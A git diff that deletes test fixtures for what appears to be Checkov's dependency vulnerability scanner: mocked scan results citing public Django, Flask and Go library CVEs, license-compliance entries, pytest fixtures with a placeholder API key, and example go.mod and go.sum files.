-                    "id": "CVE-2016-6186",
-                    "status": "fixed in 1.9.8, 1.8.14",
-                    "cvss": 6.1,
-                    "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
-                    "description": "Cross-site scripting (XSS) vulnerability in the dismissChangeRelatedObjectPopup function in contrib/admin/static/admin/js/admin/RelatedObjectLookups.js in Django before 1.8.14, 1.9.x before 1.9.8, and 1.10.x before 1.10rc1 allows remote attackers to inject arbitrary web script or HTML via vectors involving unsafe usage of Element.innerHTML.",
-                    "severity": "medium",
-                    "packageName": "django",
-                    "packageVersion": "1.2",
-                    "link": "https://nvd.nist.gov/vuln/detail/CVE-2016-6186",
-                    "riskFactors": [
-                        "Attack complexity: low",
-                        "Attack vector: network",
-                        "Exploit exists",
-                        "Has fix",
-                        "Medium severity",
-                    ],
-                    "impactedVersions": ["<=1.8.13"],
-                    "publishedDate": "2016-08-05T17:59:00+02:00",
-                    "discoveredDate": "2016-08-05T15:59:00Z",
-                    "fixDate": "2016-08-05T17:59:00+02:00",
-                },
-                {
-                    "id": "CVE-2016-7401",
-                    "status": "fixed in 1.9.10, 1.8.15",
-                    "cvss": 7.5,
-                    "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
-                    "description": "The cookie parsing code in Django before 1.8.15 and 1.9.x before 1.9.10, when used on a site with Google Analytics, allows remote attackers to bypass an intended CSRF protection mechanism by setting arbitrary cookies.",
-                    "severity": "high",
-                    "packageName": "django",
-                    "packageVersion": "1.2",
-                    "link": "https://nvd.nist.gov/vuln/detail/CVE-2016-7401",
-                    "riskFactors": ["High severity", "Attack complexity: low", "Attack vector: network", "Has fix"],
-                    "impactedVersions": ["<=1.8.14"],
-                    "publishedDate": "2016-10-03T20:59:00+02:00",
-                    "discoveredDate": "2016-10-03T18:59:00Z",
-                    "fixDate": "2016-10-03T20:59:00+02:00",
-                },
-                {
-                    "id": "CVE-2021-33203",
-                    "status": "fixed in 3.2.4, 3.1.12, 2.2.24",
-                    "cvss": 4.9,
-                    "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
-                    "description": "Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is directory traversal outside of the template root directories.",
-                    "severity": "medium",
-                    "packageName": "django",
-                    "packageVersion": "1.2",
-                    "link": "https://nvd.nist.gov/vuln/detail/CVE-2021-33203",
-                    "riskFactors": [
-                        "Attack complexity: low",
-                        "Attack vector: network",
-                        "Has fix",
-                        "Medium severity",
-                        "Recent vulnerability",
-                    ],
-                    "impactedVersions": ["<2.2.24"],
-                    "publishedDate": "2021-06-08T20:15:00+02:00",
-                    "discoveredDate": "2021-06-08T18:15:00Z",
-                    "fixDate": "2021-06-08T20:15:00+02:00",
-                },
-                {
-                    "id": "CVE-2019-1010083",
-                    "status": "fixed in 1.0",
-                    "cvss": 7.5,
-                    "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
-                    "description": "The Pallets Project Flask before 1.0 is affected by: unexpected memory usage. The impact is: denial of service. The attack vector is: crafted encoded JSON data. The fixed version is: 1. NOTE: this may overlap CVE-2018-1000656.",
-                    "severity": "high",
-                    "packageName": "flask",
-                    "packageVersion": "0.6",
-                    "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010083",
-                    "riskFactors": [
-                        "Attack complexity: low",
-                        "Attack vector: network",
-                        "DoS",
-                        "Has fix",
-                        "High severity",
-                    ],
-                    "impactedVersions": ["<1.0"],
-                    "publishedDate": "2019-07-17T16:15:00+02:00",
-                    "discoveredDate": "2019-07-17T14:15:00Z",
-                    "fixDate": "2019-07-17T16:15:00+02:00",
-                },
-                {
-                    "id": "CVE-2018-1000656",
-                    "status": "fixed in 0.12.3",
-                    "cvss": 7.5,
-                    "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
-                    "description": "The Pallets Project flask version Before 0.12.3 contains a CWE-20: Improper Input Validation vulnerability in flask that can result in Large amount of memory usage possibly leading to denial of service. This attack appear to be exploitable via Attacker provides JSON data in incorrect encoding. This vulnerability appears to have been fixed in 0.12.3. NOTE: this may overlap CVE-2019-1010083.",
-                    "severity": "high",
-                    "packageName": "flask",
-                    "packageVersion": "0.6",
-                    "link": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000656",
-                    "riskFactors": [
-                        "Attack complexity: low",
-                        "Attack vector: network",
-                        "DoS",
-                        "Has fix",
-                        "High severity",
-                    ],
-                    "impactedVersions": ["<0.12.3"],
-                    "publishedDate": "2018-08-20T21:31:00+02:00",
-                    "discoveredDate": "2018-08-20T19:31:00Z",
-                    "fixDate": "2018-08-20T21:31:00+02:00",
-                },
-            ],
-            "vulnerabilityDistribution": {"critical": 1, "high": 3, "medium": 2, "low": 0, "total": 6},
-            "license_statuses": [
-                {
-                    "packageName": "django",
-                    "packageVersion": "1.2",
-                    "packageLang": "python",
-                    "license": "OSI_BDS",
-                    "status": "COMPLIANT",
-                    "policy": "BC_LIC_1"
-                },
-                {
-                    "packageName": "flask",
-                    "packageVersion": "0.6",
-                    "packageLang": "python",
-                    "license": "OSI_APACHE",
-                    "status": "COMPLIANT",
-                    "policy": "BC_LIC_1"
-                },
-                {
-                    "packageName": "flask",
-                    "packageVersion": "0.6",
-                    "packageLang": "python",
-                    "license": 'DUMMY_OTHER_LICENSE, ANOTHER_DOMMY_LICENSE', # for testing a comma inside licenses
-                    "status": "OPEN",
-                    "policy": "BC_LIC_1"
-                },
-                {
-                    "packageName": "requests",
-                    "packageVersion": "2.26.0",
-                    "packageLang": "python",
-                    "license": "OSI_APACHE",
-                    "status": "COMPLIANT",
-                    "policy": "BC_LIC_1"
-                }
-            ],
-        },
-        {
-            "repository": "/path/to/sub/requirements.txt",
-            "passed": True,
-            "packages": [
-                {
-                    "type": "python",
-                    "name": "requests",
-                    "version": "2.26.0",
-                    "path": "/path/to/sub/requirements.txt",
-                }
-            ],
-            "complianceIssues": None,
-            "complianceDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 0, "total": 0},
-            "vulnerabilities": None,
-            "vulnerabilityDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 0, "total": 0},
-            "license_statuses": [
-                {
-                    "packageName": "requests",
-                    "packageVersion": "2.26.0",
-                    "packageLang": "python",
-                    "license": "OSI_APACHE",
-                    "status": "COMPLIANT",
-                    "policy": "BC_LIC_1"
-                }
-            ],
-        },
-        {
-            "repository": "/path/to/go.sum",
-            "passed": True,
-            "packages": [
-                {
-                    "type": "go",
-                    "name": "github.com/miekg/dns",
-                    "version": "v1.1.41",
-                    "path": "/path/to/go.sum",
-                },
-                {
-                    "type": "go",
-                    "name": "golang.org/x/crypto",
-                    "version": "v0.0.1",
-                    "path": "/path/to/go.sum",
-                },
-                {
-                    "type": "go",
-                    "name": "github.com/dgrijalva/jwt-go",
-                    "version": "v3.2.0",
-                    "path": "/path/to/go.sum",
-                },
-                {
-                    "type": "go",
-                    "name": "github.com/prometheus/client_model",
-                    "version": "v0.0.0-20190129233127-fd36f4220a90",
-                    "path": "/path/to/go.sum",
-                }
-            ],
-            "complianceIssues": None,
-            "complianceDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 0, "total": 0},
-            "vulnerabilities": [
-                {
-                    "id": "CVE-2020-29652",
-                    "status": "fixed in v0.0.2",
-                    "cvss": 7.5,
-                    "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
-                    "description": "A nil pointer dereference in the golang.org/x/crypto/ssh component through v0.0.3 for Go allows remote attackers to cause a denial of service against SSH servers.",
-                    "severity": "high",
-                    "packageName": "golang.org/x/crypto",
-                    "packageVersion": "v0.0.1",
-                    "link": "https://nvd.nist.gov/vuln/detail/CVE-2020-29652",
-                    "riskFactors": [
-                        "Has fix",
-                        "High severity",
-                        "Attack complexity: low",
-                        "Attack vector: network",
-                        "DoS",
-                    ],
-                    "impactedVersions": ["<v0.0.2"],
-                    "publishedDate": "2020-12-17T06:15:00+01:00",
-                    "discoveredDate": "2020-12-17T05:15:00Z",
-                    "fixDate": "2020-12-17T06:15:00+01:00",
-                },
-                {
-                    "id": "CVE-2020-26160",
-                    "status": "fixed in v4.0.0-preview1",
-                    "cvss": 7.7,
-                    "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
-                    "description": 'jwt-go before 4.0.0-preview1 allows attackers to bypass intended access restrictions in situations with []string{} for m[\\"aud\\"] (which is allowed by the specification). Because the type assertion fails, \\"\\" is the value of aud. This is a security problem if the JWT token is presented to a service that lacks its own audience check.',
-                    "severity": "high",
-                    "packageName": "github.com/dgrijalva/jwt-go",
-                    "packageVersion": "v3.2.0",
-                    "link": "https://nvd.nist.gov/vuln/detail/CVE-2020-26160",
-                    "riskFactors": ["High severity", "Attack complexity: low", "Attack vector: network", "Has fix"],
-                    "impactedVersions": ["<v4.0.0-preview1"],
-                    "publishedDate": "2020-09-30T20:15:00+02:00",
-                    "discoveredDate": "2020-09-30T18:15:00Z",
-                    "fixDate": "2020-09-30T20:15:00+02:00",
-                },
-            ],
-            "vulnerabilityDistribution": {"critical": 0, "high": 2, "medium": 0, "low": 0, "total": 2},
-        },
-    ]
-
-
-@pytest.fixture()
-@mock.patch.dict(os.environ, {'CHECKOV_RUN_SCA_PACKAGE_SCAN_V2': 'false'})
-def scan_result_success_response() -> Dict[str, Any]:
-    return {'outputType': 'Result',
-     'outputData': "H4sIAN22X2IC/8WY23LbOBKGX6VLN5tUWRQp"
-                   "+SCrZi88drL2VqKkLMUzNZu5gEjIQkwSXAKUrU3l3fdvgDofnNS4MheJKbIJdAP"
-                   "/193g10YpC22U1eWs0aNGy2ZFq5SmSq3B3/9WqpSZzK0J7JNtHFGjEMbIBKa2rKT7HT"
-                   "+Ie2lw5z9fG3ZWSB6mmNmJztk+F5m7k3wR+b3mO1NZGoWHuBkFbT+mnTw"
-                   "/+bcjOjTBOBXmYWP8MDh9sfHZXhprNqZoB+3TIPyBWf6EaayzIlUij"
-                   "+WNMZVbvLxK07UnV8rYUo0q6yf62ohLZVUsUvwIYTlR95P6MpOJqrL6R6of6yurrbf+xi5XaS5LMVIpRplvl"
-                   "+KNbFzevWm2w+i0eRp13XoZK2xl3KKqJ5mQyikKzoPuEf50g+iYbeKpYYvTIHLrEUNAfqzBoNcJwtbFXa"
-                   "/furjsvWt9vMXVp5vebWvQu2zxnRv8u+j1eZhEGsRV1EE2LkttTBNylFTfz+/p1e"
-                   "+DwWtaDWDGLtmJpESZTBlzOYG45K1MhZXJh9EXuPNRF1VB4yqPeWy2j3XOC9oSSabyFseo4vrHF1NfrA3x"
-                   "TuuHqjDBF8OvXzkB00iOdSnrhThy6/K0vOkWSeQJLqNw9UEUlnFEIsXuGIIeNCIU1gIeSImsxgw8JYlypGw"
-                   "pyhk9ylG9BqRLuh6+f0dTJcgvNXs01emUl6fKjRhLqgwwJD2mN6mTW6ByrBe/F7g9lRAtVo5XudbLkt7+Fq"
-                   "T1g7stVlOVP/DPibWF6bVa+TQJckg1uNfTFu9RK5FWqLS1papSmYe3wnnP6mtcuPDJKV4+wbUesXZhWT/xoQ"
-                   "INaR916dh+81SkWlmCfY3itTAElfLlexcWLSJl0lSGSLCjdSB+5l/+6bav4yyKapQqM5HJFXbeEc1Oh91meD"
-                   "KMTnon570w/MNJVZlYY+jnLeHPQROXaTbYOzsOowPsRWEN38kKfGfByffC1wd8nwBfH/Bd74FvCKBiaF5JKgS"
-                   "WC9qKdSL3iP+k1vmG/tnRx4nMoUd4D/IEOZwflZ3Qv7S+TyVd5CKdgT5zdIiI0YxrDWaBA1bmCYa7HNy+paKE"
-                   "qac6kzHIRw6AMfbdunSxRMgHY7b071LnT1L/fF9fQv0rWr9GCN+v9OMDSo/CZtgZRt3nlb7DclPpmybbSj9vR"
-                   "ufd4+M9Uod4uaCgqAbnLPgI6362oniXX7cVHx1Q/HWt+Osdit+UtZuOp19IuvaEpd5Z3nVuzrUr4lhXuSUrHi"
-                   "SvWkAXZCplxSiFBEsxxqaQzKAKEkmCxsDQKzsRlpQhdAciZbFD5S6nuYRuZPn58z/Mxks8UEmxMBK9l8gNPMmE"
-                   "wwBJ/1OuHKvgoWQZlOY1PeoqTbyXPP4cLscW6itqBOBkxqCvBAgCIDx7ALsY2pVXjB9DL86jeZwBvfqQ4xHaiH"
-                   "sxr61snMtHDJJKOGg4NkyDOZKdMxhkBqwOTPjNUt4jdNabn2kt7uD1Jr6LRuinILwi2Jdg+LJ2fgnvCtj7OZ6js"
-                   "I9jeNluRt1hdN5DnTnE8U7LdY63TbY4bkfNTqcddvZy3A7QHYHMIGp7nturbeMxQ/Usx9ebHPf3VK51jv1sR+vA"
-                   "ekc8x+3VB3CUJlh/oIC6kluFvUnQsrNrMyaNm33c4+bLyyuoO8nA9YyJjk1AAyvGY9SjbMTVK3bkVUwq5D2U0Ad"
-                   "W98rp6k6Bkyn/B/WDLsiEjRz9En0/07wsYWOVooDRRZIoDhYwz45IjekVR+IYUuPXvhWWY4EjBy2cIlvPaxDfVC"
-                   "JikB1XxupM/Q/bhJIpChw2Yk9xAj2muqiLr0gN8J0gc7AHrnfmI8wRT5VTrm0N8JrnOKz4F/n22nt1Llr6IZ9w6p"
-                   "RJQDdIXzAviVOEHx/bgvSxaw90ZY1K3BLxFPMAqdRwaP7Cror/EzveVTJeuOhvNri4dStjzuNrh6MDaaQGcU8Wge"
-                   "shd6tcwA9nkd2Wa1lkh8l2N9BFxxCGpyf7jp0os+2g89db3v6eBoBb3o+ASkKiH0vtjmDuQwLVR3z61ecJ74jTs1"
-                   "A5Z4vL3ziCHt1kaEiBDZRcQP93IlWJJ2rrxOpHdrU/RkH23wj4wTtR4uwmMtdHaJdHWPj+SAdQjOJeAqU14f4AeC"
-                   "Yy5zwFU9TLqYplQMMJoPE1nrmWYl7opT8zoR2RLoldzPsA+D0FTYb+PfjQJzgt2BeVx7pkkghMa56wHns9HD+Fyx"
-                   "VLqjf2LaD+h+GbHiLG65mYEcsoFQUtS2uI/e92vrdDX3zj2Ya1/tTzo9V9TYB7cN0B5ZUeHGzIl0Rvsr6fzVrr+y"
-                   "p8l4+R7ZCLcic6WOF3Wq5X+G2TnZ263529x9Lw54L51uGzaNZDrhKoupKXEtWsR1UOrfufqwSxflFS3KLjnd5ueu"
-                   "anz3q7neGie2cS8HcBin/BL8U8U/AL0XOSX+jt75P82r6+RIV6DoZDXW14oKMNz5rR2TA6fr6j3WG52dFumrjvsG"
-                   "sp7dAH12j5wbWz+sG1vfOD6+m3b/8HQd/FwVgXAAA=",
-     'compressionMethod': 'gzip'}
-
-
-@pytest.fixture(scope='package')
-@mock.patch.dict(os.environ, {'CHECKOV_RUN_SCA_PACKAGE_SCAN_V2': 'false'})
-def sca_package_report(package_mocker: MockerFixture, scan_result: List[Dict[str, Any]]) -> Report:
-    bc_integration.bc_api_key = "abcd1234-abcd-1234-abcd-1234abcd1234"
-    scanner_mock = MagicMock()
-    scanner_mock.return_value.scan.return_value = scan_result
-    package_mocker.patch("checkov.sca_package.runner.Scanner", side_effect=scanner_mock)
-
-    return Runner().run(root_folder=EXAMPLES_DIR)
-
-@pytest.fixture(scope='package')
-def sca_package_report_with_comma_in_licenses(package_mocker: MockerFixture, scan_result_with_comma_in_licenses: List[Dict[str, Any]]) -> Report:
-    bc_integration.bc_api_key = "abcd1234-abcd-1234-abcd-1234abcd1234"
-    scanner_mock = MagicMock()
-    scanner_mock.return_value.scan.return_value = scan_result_with_comma_in_licenses
-    package_mocker.patch("checkov.sca_package.runner.Scanner", side_effect=scanner_mock)
-
-    package_mocker.patch.dict(os.environ, {'CHECKOV_RUN_SCA_PACKAGE_SCAN_V2': 'false'})
-    return Runner().run(root_folder=EXAMPLES_DIR)
-
-
-def get_sca_package_report_with_skip(package_mocker: MockerFixture, scan_result: List[Dict[str, Any]]) -> Report:
-    bc_integration.bc_api_key = "abcd1234-abcd-1234-abcd-1234abcd1234"
-    scanner_mock = MagicMock()
-    scanner_mock.return_value.scan.return_value = scan_result
-    package_mocker.patch("checkov.sca_package.runner.Scanner", side_effect=scanner_mock)
-    runner_filter = RunnerFilter(skip_checks=["CKV_CVE_2020_29652"])
-
-    return Runner().run(root_folder=EXAMPLES_DIR, runner_filter=runner_filter)
-
-
-@pytest.fixture(scope='package')
-def sca_package_report_with_skip(package_mocker: MockerFixture, scan_result: List[Dict[str, Any]]) -> Report:
-    return get_sca_package_report_with_skip(package_mocker, scan_result)
-
-
-@pytest.fixture(scope='function')
-def sca_package_report_with_skip_scope_function(package_mocker: MockerFixture, scan_result: List[Dict[str, Any]]) -> Report:
-    return get_sca_package_report_with_skip(package_mocker, scan_result)
diff --git a/tests/sca_package/examples/go.mod b/tests/sca_package/examples/go.mod
deleted file mode 100644
index d6749d1c251..00000000000
--- a/tests/sca_package/examples/go.mod
+++ /dev/null
@@ -1,60 +0,0 @@
-module github.com/gruebel/checkov
-
-require (
-	github.com/abbot/go-http-auth v0.4.0
-	github.com/aryszka/jobqueue v0.0.2
-	github.com/cenkalti/backoff v2.2.1+incompatible
-	github.com/cjoudrey/gluahttp v0.0.0-20190104103309-101c19a37344
-	github.com/cjoudrey/gluaurl v0.0.0-20161028222611-31cbb9bef199
-	github.com/codahale/hdrhistogram v0.0.0-20161010025455-3a0bb77429bd // indirect
-	github.com/coreos/go-oidc v2.0.0+incompatible
-	github.com/dgrijalva/jwt-go v3.2.0+incompatible
-	github.com/dimfeld/httppath v0.0.0-20170720192232-ee938bf73598
-	github.com/felixge/httpsnoop v1.0.0 // indirect
-	github.com/ghodss/yaml v1.0.0
-	github.com/go-redis/redis/v8 v8.3.3
-	github.com/google/go-cmp v0.5.2
-	github.com/hashicorp/memberlist v0.1.4
-	github.com/instana/go-sensor v1.4.16
-	github.com/lightstep/lightstep-tracer-go v0.24.1-0.20210318180546-a67254760a58
-	github.com/looplab/fsm v0.1.0 // indirect
-	github.com/miekg/dns v1.1.41 // indirect
-	github.com/oklog/ulid v1.3.1
-	github.com/opentracing/basictracer-go v1.0.0
-	github.com/opentracing/opentracing-go v1.1.0
-	github.com/pkg/errors v0.8.1
-	github.com/pquerna/cachecontrol v0.0.0-20180517163645-1555304b9b35 // indirect
-	github.com/prometheus/client_golang v1.0.0
-	github.com/rcrowley/go-metrics v0.0.0-20181016184325-3113b8401b8a
-	github.com/sanity-io/litter v1.1.0
-	github.com/sarslanhan/cronmask v0.0.0-20190709075623-766eca24d011
-	github.com/shirou/gopsutil v3.21.2+incompatible // indirect
-	github.com/sirupsen/logrus v1.4.2
-	github.com/sony/gobreaker v0.4.1
-	github.com/stretchr/testify v1.6.1
-	github.com/szuecs/rate-limit-buffer v0.7.1
-	github.com/szuecs/routegroup-client v0.17.7
-	github.com/tidwall/gjson v1.7.4
-	github.com/tklauser/go-sysconf v0.3.5 // indirect
-	github.com/uber-go/atomic v1.4.0 // indirect
-	github.com/uber/jaeger-client-go v2.16.0+incompatible
-	github.com/uber/jaeger-lib v2.0.0+incompatible
-	github.com/yookoala/gofast v0.6.0
-	github.com/yuin/gopher-lua v0.0.0-20200603152657-dc2b0ca8b37e
-	go.uber.org/atomic v1.4.0 // indirect
-	golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9
-	golang.org/x/net v0.0.0-20210415231046-e915ea6b2b7d
-	golang.org/x/oauth2 v0.0.0-20190604053449-0f29369cfe45
-	golang.org/x/sync v0.0.0-20210220032951-036812b2e83c
-	golang.org/x/sys v0.0.0-20210415045647-66c3f260301c // indirect
-	golang.org/x/tools v0.1.0 // indirect
-	google.golang.org/grpc v1.22.0 // indirect
-	gopkg.in/alecthomas/kingpin.v2 v2.2.6
-	gopkg.in/square/go-jose.v2 v2.3.1
-	gopkg.in/yaml.v2 v2.4.0
-	k8s.io/api v0.18.6
-	k8s.io/apimachinery v0.18.6
-	layeh.com/gopher-json v0.0.0-20190114024228-97fed8db8427
-)
-
-go 1.13
diff --git a/tests/sca_package/examples/go.sum b/tests/sca_package/examples/go.sum
deleted file mode 100644
index 82a4209448b..00000000000
--- a/tests/sca_package/examples/go.sum
+++ /dev/null
@@ -1,511 +0,0 @@
-cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw=
-cloud.google.com/go v0.34.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw=
-cloud.google.com/go v0.38.0 h1:ROfEUZz+Gh5pa62DJWXSaonyu3StP6EA6lPEXPI6mCo=
-cloud.google.com/go v0.38.0/go.mod h1:990N+gfupTy94rShfmMCWGDn0LpTmnzTp2qbd1dvSRU=
-github.com/Azure/go-autorest/autorest v0.9.0/go.mod h1:xyHB1BMZT0cuDHU7I0+g046+BFDTQ8rEZB0s4Yfa6bI=
-github.com/Azure/go-autorest/autorest/adal v0.5.0/go.mod h1:8Z9fGy2MpX0PvDjB1pEgQTmVqjGhiHBW7RJJEciWzS0=
-github.com/Azure/go-autorest/autorest/date v0.1.0/go.mod h1:plvfp3oPSKwf2DNjlBjWF/7vwR+cUD/ELuzDCXwHUVA=
-github.com/Azure/go-autorest/autorest/mocks v0.1.0/go.mod h1:OTyCOPRA2IgIlWxVYxBee2F5Gr4kF2zd2J5cFRaIDN0=
-github.com/Azure/go-autorest/autorest/mocks v0.2.0/go.mod h1:OTyCOPRA2IgIlWxVYxBee2F5Gr4kF2zd2J5cFRaIDN0=
-github.com/Azure/go-autorest/logger v0.1.0/go.mod h1:oExouG+K6PryycPJfVSxi/koC6LSNgds39diKLz7Vrc=
-github.com/Azure/go-autorest/tracing v0.5.0/go.mod h1:r/s2XiOKccPW3HrqB+W0TQzfbtp2fGCgRFtBroKn4Dk=
-github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU=
-github.com/BurntSushi/xgb v0.0.0-20160522181843-27f122750802/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo=
-github.com/NYTimes/gziphandler v0.0.0-20170623195520-56545f4a5d46/go.mod h1:3wb06e3pkSAbeQ52E9H9iFoQsEEwGN64994WTCIhntQ=
-github.com/PuerkitoBio/purell v1.0.0/go.mod h1:c11w/QuzBsJSee3cPx9rAFu61PvFxuPbtSwDGJws/X0=
-github.com/PuerkitoBio/purell v1.1.1/go.mod h1:c11w/QuzBsJSee3cPx9rAFu61PvFxuPbtSwDGJws/X0=
-github.com/PuerkitoBio/urlesc v0.0.0-20160726150825-5bd2802263f2/go.mod h1:uGdkoq3SwY9Y+13GIhn11/XLaGBb4BfwItxLd5jeuXE=
-github.com/PuerkitoBio/urlesc v0.0.0-20170810143723-de5bf2ad4578/go.mod h1:uGdkoq3SwY9Y+13GIhn11/XLaGBb4BfwItxLd5jeuXE=
-github.com/StackExchange/wmi v0.0.0-20190523213315-cbe66965904d h1:G0m3OIz70MZUWq3EgK3CesDbo8upS2Vm9/P3FtgI+Jk=
-github.com/StackExchange/wmi v0.0.0-20190523213315-cbe66965904d/go.mod h1:3eOhrUMpNV+6aFIbp5/iudMxNCF27Vw2OZgy4xEx0Fg=
-github.com/abbot/go-http-auth v0.4.0 h1:QjmvZ5gSC7jm3Zg54DqWE/T5m1t2AfDu6QlXJT0EVT0=
-github.com/abbot/go-http-auth v0.4.0/go.mod h1:Cz6ARTIzApMJDzh5bRMSUou6UMSp0IEXg9km/ci7TJM=
-github.com/alecthomas/template v0.0.0-20160405071501-a0175ee3bccc h1:cAKDfWh5VpdgMhJosfJnn5/FoN2SRZ4p7fJNX58YPaU=
-github.com/alecthomas/template v0.0.0-20160405071501-a0175ee3bccc/go.mod h1:LOuyumcjzFXgccqObfd/Ljyb9UuFJ6TxHnclSeseNhc=
-github.com/alecthomas/units v0.0.0-20151022065526-2efee857e7cf h1:qet1QNfXsQxTZqLG4oE62mJzwPIB8+Tee4RNCL9ulrY=
-github.com/alecthomas/units v0.0.0-20151022065526-2efee857e7cf/go.mod h1:ybxpYRFXyAe+OPACYpWeL0wqObRcbAqCMya13uyzqw0=
-github.com/armon/go-metrics v0.0.0-20180917152333-f0300d1749da h1:8GUt8eRujhVEGZFFEjBj46YV4rDjvGrNxb0KMWYkL2I=
-github.com/armon/go-metrics v0.0.0-20180917152333-f0300d1749da/go.mod h1:Q73ZrmVTwzkszR9V5SSuryQ31EELlFMUz1kKyl939pY=
-github.com/aryszka/jobqueue v0.0.2 h1:LYPhzklo0XFpVF+QtzfP9XRQPEsbJ2EW5Pur6pxxaS4=
-github.com/aryszka/jobqueue v0.0.2/go.mod h1:SdxqI6HZ4E1Lss94tey5OfjcAu3bdCDWS1AQzzIN4m4=
-github.com/beorn7/perks v0.0.0-20180321164747-3a771d992973/go.mod h1:Dwedo/Wpr24TaqPxmxbtue+5NUziq4I4S80YR8gNf3Q=
-github.com/beorn7/perks v1.0.0 h1:HWo1m869IqiPhD389kmkxeTalrjNbbJTC8LXupb+sl0=
-github.com/beorn7/perks v1.0.0/go.mod h1:KWe93zE9D1o94FZ5RNwFwVgaQK1VOXiVxmqh+CedLV8=
-github.com/cenkalti/backoff v2.2.1+incompatible h1:tNowT99t7UNflLxfYYSlKYsBpXdEet03Pg2g16Swow4=
-github.com/cenkalti/backoff v2.2.1+incompatible/go.mod h1:90ReRw6GdpyfrHakVjL/QHaoyV4aDUVVkXQJJJ3NXXM=
-github.com/cespare/xxhash/v2 v2.1.1 h1:6MnRN8NT7+YBpUIWxHtefFZOKTAPgGjpQSxqLNn0+qY=
-github.com/cespare/xxhash/v2 v2.1.1/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs=
-github.com/chzyer/logex v1.1.10/go.mod h1:+Ywpsq7O8HXn0nuIou7OrIPyXbp3wmkHB+jjWRnGsAI=
-github.com/chzyer/readline v0.0.0-20180603132655-2972be24d48e/go.mod h1:nSuG5e5PlCu98SY8svDHJxuZscDgtXS6KTTbou5AhLI=
-github.com/chzyer/test v0.0.0-20180213035817-a1ea475d72b1/go.mod h1:Q3SI9o4m/ZMnBNeIyt5eFwwo7qiLfzFZmjNmxjkiQlU=
-github.com/cjoudrey/gluahttp v0.0.0-20190104103309-101c19a37344 h1:nTK6O2RY1nHC4jNEJd1nixVP7ygY3QE4CNxCX07dHKU=
-github.com/cjoudrey/gluahttp v0.0.0-20190104103309-101c19a37344/go.mod h1:X97UjDTXp+7bayQSFZk2hPvCTmTZIicUjZQRtkwgAKY=
-github.com/cjoudrey/gluaurl v0.0.0-20161028222611-31cbb9bef199 h1:cJ1E8ZwZLfercTX3dywnCAQDilbbi+m2cw3+8tCFpRo=
-github.com/cjoudrey/gluaurl v0.0.0-20161028222611-31cbb9bef199/go.mod h1:jC+zrjHA5CaxJzn+tojIoIOzSp/6BlkRWXnMlxNkB+g=
-github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw=
-github.com/codahale/hdrhistogram v0.0.0-20161010025455-3a0bb77429bd h1:qMd81Ts1T2OTKmB4acZcyKaMtRnY5Y44NuXGX2GFJ1w=
-github.com/codahale/hdrhistogram v0.0.0-20161010025455-3a0bb77429bd/go.mod h1:sE/e/2PUdi/liOCUjSTXgM1o87ZssimdTWN964YiIeI=
-github.com/coreos/go-oidc v2.0.0+incompatible h1:+RStIopZ8wooMx+Vs5Bt8zMXxV1ABl5LbakNExNmZIg=
-github.com/coreos/go-oidc v2.0.0+incompatible/go.mod h1:CgnwVTmzoESiwO9qyAFEMiHoZ1nMCKZlZ9V6mm3/LKc=
-github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
-github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
-github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
-github.com/dgrijalva/jwt-go v3.2.0+incompatible h1:7qlOGliEKZXTDg6OTjfoBKDXWrumCAMpl/TFQ4/5kLM=
-github.com/dgrijalva/jwt-go v3.2.0+incompatible/go.mod h1:E3ru+11k8xSBh+hMPgOLZmtrrCbhqsmaPHjLKYnJCaQ=
-github.com/dgryski/go-rendezvous v0.0.0-20200823014737-9f7001d12a5f h1:lO4WD4F/rVNCu3HqELle0jiPLLBs70cWOduZpkS1E78=
-github.com/dgryski/go-rendezvous v0.0.0-20200823014737-9f7001d12a5f/go.mod h1:cuUVRXasLTGF7a8hSLbxyZXjz+1KgoB3wDUb6vlszIc=
-github.com/dimfeld/httppath v0.0.0-20170720192232-ee938bf73598 h1:MGKhKyiYrvMDZsmLR/+RGffQSXwEkXgfLSA08qDn9AI=
-github.com/dimfeld/httppath v0.0.0-20170720192232-ee938bf73598/go.mod h1:0FpDmbrt36utu8jEmeU05dPC9AB5tsLYVVi+ZHfyuwI=
-github.com/docker/spdystream v0.0.0-20160310174837-449fdfce4d96/go.mod h1:Qh8CwZgvJUkLughtfhJv5dyTYa91l1fOUCrgjqmcifM=
